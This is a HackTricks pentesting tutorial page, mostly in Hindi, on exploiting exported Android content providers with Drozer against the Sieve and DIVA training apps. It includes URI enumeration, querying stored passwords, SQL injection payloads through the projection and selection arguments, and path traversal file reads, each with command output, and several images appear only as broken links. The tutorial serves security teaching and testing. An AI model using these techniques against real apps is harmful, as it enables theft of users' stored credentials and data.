HackTricksExploiting Content Providers
Reading time: 6 minutes
Exploiting Content Providers
tip
AWS हैकिंग सीखें और अभ्यास करें:
HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: 
HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
Intro
डेटा एक एप्लिकेशन से अन्य एप्लिकेशनों को एक घटक के माध्यम से अनुरोध पर सप्लाई किया जाता है जिसे कंटेंट प्रोवाइडर कहा जाता है। इन अनुरोधों का प्रबंधन ContentResolver class के तरीकों के माध्यम से किया जाता है। कंटेंट प्रोवाइडर अपने डेटा को विभिन्न स्थानों पर स्टोर कर सकते हैं, जैसे कि डेटाबेस, फाइलें, या एक नेटवर्क पर।
Manifest.xml फ़ाइल में, कंटेंट प्रोवाइडर की घोषणा आवश्यक है। उदाहरण के लिए:
<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>
content://com.mwr.example.sieve.DBContentProvider/Keys तक पहुँचने के लिए READ_KEYS अनुमति आवश्यक है। यह ध्यान देने योग्य है कि /Keys/ पथ निम्नलिखित अनुभाग में उपलब्ध है, जो डेवलपर की एक गलती के कारण सुरक्षित नहीं है, जिसने /Keys को सुरक्षित किया लेकिन /Keys/ को घोषित किया।
शायद आप निजी डेटा तक पहुँच सकते हैं या कुछ कमजोरियों (SQL Injection या Path Traversal) का लाभ उठा सकते हैं।
खुली सामग्री प्रदाताओं से जानकारी प्राप्त करें
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
यह संभव है कि DBContentProvider तक पहुँचने के लिए URIs को “content://” से शुरू किया जाए। यह दृष्टिकोण Drozer का उपयोग करने से प्राप्त अंतर्दृष्टियों पर आधारित है, जहाँ महत्वपूर्ण जानकारी /Keys निर्देशिका में स्थित थी।
Drozer कई URIs का अनुमान लगा सकता है और कोशिश कर सकता है:
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
आपको ContentProvider कोड की भी जांच करनी चाहिए ताकि आप क्वेरीज़ खोज सकें:
%20(1)%20(1)%20(1).png)
इसके अलावा, यदि आप पूर्ण क्वेरीज़ नहीं खोज पा रहे हैं तो आप देख सकते हैं कि ContentProvider द्वारा कौन से नाम घोषित किए गए हैं onCreate विधि पर:
.png)
क्वेरी इस तरह होगी: content://name.of.package.class/declared_name
डेटाबेस-समर्थित कंटेंट प्रोवाइडर
संभवतः अधिकांश Content Providers का उपयोग डेटाबेस के लिए इंटरफेस के रूप में किया जाता है। इसलिए, यदि आप इसे एक्सेस कर सकते हैं तो आप जानकारी निकालने, अपडेट करने, डालने और हटाने में सक्षम हो सकते हैं।
जांचें कि क्या आप संवेदनशील जानकारी तक पहुँच सकते हैं या इसे अधिकार प्राधिकरण तंत्र को बायपास करने के लिए बदलने की कोशिश करें।
Content Provider के कोड की जांच करते समय देखें कि क्या फंक्शंस नामित हैं जैसे: query, insert, update और delete:
.png)
%20(1)%20(1)%20(1)%20(1)%20(1)%20(1).png)
क्योंकि आप उन्हें कॉल करने में सक्षम होंगे
क्वेरी सामग्री
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com
Insert content
डेटाबेस को क्वेरी करके आप कॉलम के नाम जानेंगे, फिर, आप DB में डेटा डालने में सक्षम होंगे:
.png)
.png)
ध्यान दें कि इनसर्ट और अपडेट में आप --string का उपयोग स्ट्रिंग को इंगित करने के लिए, --double को डबल को इंगित करने के लिए, --float, --integer, --long, --short, --boolean के लिए कर सकते हैं
Update content
कॉलम के नाम को जानकर आप एंट्रीज़ को भी संशोधित कर सकते हैं:
.png)
Delete content
.png)
SQL Injection
SQL इंजेक्शन (SQLite) के लिए परीक्षण करना सरल है प्रोजेक्शन और चयन फ़ील्ड्स को मैनिपुलेट करके जो कंटेंट प्रोवाइडर को पास किए जाते हैं।
कंटेंट प्रोवाइडर को क्वेरी करते समय जानकारी खोजने के लिए 2 दिलचस्प तर्क हैं: --selection और --projection:
.png)
आप SQL इंजेक्शन के लिए परीक्षण करने के लिए इन पैरामीटर्स का दुरुपयोग करने की कोशिश कर सकते हैं:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
FROM SQLITE_MASTER WHERE type='table';--"
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |
| table | Passwords | Passwords | 4 | CREATE TABLE ... |
Drozer द्वारा स्वचालित SQLInjection खोज
dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
android_metadata
notes
sqlite_sequence
फाइल सिस्टम-समर्थित सामग्री प्रदाता
सामग्री प्रदाता का उपयोग फाइलों तक पहुँचने के लिए भी किया जा सकता है:
.png)
पढ़ें फाइल
आप सामग्री प्रदाता से फाइलें पढ़ सकते हैं।
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
पथ यात्रा
यदि आप फ़ाइलों तक पहुँच सकते हैं, तो आप पथ यात्रा का दुरुपयोग करने की कोशिश कर सकते हैं (इस मामले में यह आवश्यक नहीं है लेकिन आप "../" और समान तरकीबों का उपयोग करने की कोशिश कर सकते हैं)।
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
Drozer द्वारा स्वचालित पथ यात्रा खोज
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
संदर्भ
- https://www.tutorialspoint.com/android/android_content_providers.htm
- https://manifestsecurity.com/android-application-security-part-15/
- https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।